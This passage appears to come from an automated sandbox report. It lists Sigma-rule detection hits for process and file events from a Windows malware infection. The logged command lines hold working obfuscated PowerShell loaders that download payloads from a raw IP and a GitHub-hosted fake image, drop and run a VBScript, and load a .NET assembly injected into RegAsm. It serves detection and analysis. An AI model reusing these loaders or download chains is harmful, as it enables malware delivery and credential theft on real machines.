zID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygn
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))", CommandLine: "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FI
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4408, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe, ProcessId: 940, ProcessName: powershell.exe
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4408, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" , ProcessId: 1396, ProcessName: wscript.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygn
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4408, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline", ProcessId: 4308, ProcessName: csc.exe
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4408, TargetFilename: C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwva", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwva", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 5940, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwva", ProcessId: 6412, ProcessName: RegAsm.exe
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWR
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3Jl